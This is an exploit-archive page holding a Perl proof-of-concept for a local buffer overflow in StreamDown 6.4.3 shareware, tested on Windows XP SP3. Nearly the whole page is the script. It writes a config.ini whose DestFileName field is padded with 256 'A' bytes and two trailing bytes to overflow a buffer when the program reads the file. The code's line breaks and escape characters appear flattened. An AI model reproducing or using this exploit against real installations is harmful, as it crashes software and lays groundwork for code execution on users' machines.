Home / os / win10

streamdown-overflow.txt

Posted on 05 February 2009

#!perl # # StreamDown v6.4.3 Local Buffer Overflow Exploit (0day) # ------------------------------------------------------- # Research & Exploit [Todor Donev :: todor.donev@gmail.com] # ------------------------------------------------------- # Shareware software for downloading and stream ripping # # Tested on Windows XP SP3 # Proof Of Concept # # Best regards and be safe, # Todor Donev # $overflow = "x41" x 256; $x = "x05x01"; open(my $config, "> config.ini"); print $config "[SnifferPos] ". "X=300 ". "Y=5 ". "state=0 ". "[TimeOut] ". "Default=30 ". "[Proxy] ". "server= ". "port= ". "enable=0 ". "[DestPath] ". "Default=c:MyDownloads ". "[Down] ". "Count=1 ". "[0] ". "URL= ". "DestFileName=c:MyDownloadshttp". $overflow.$x." ". "State=5 ". "TotalSize=0 "; close $config;

 

TOP

Malware :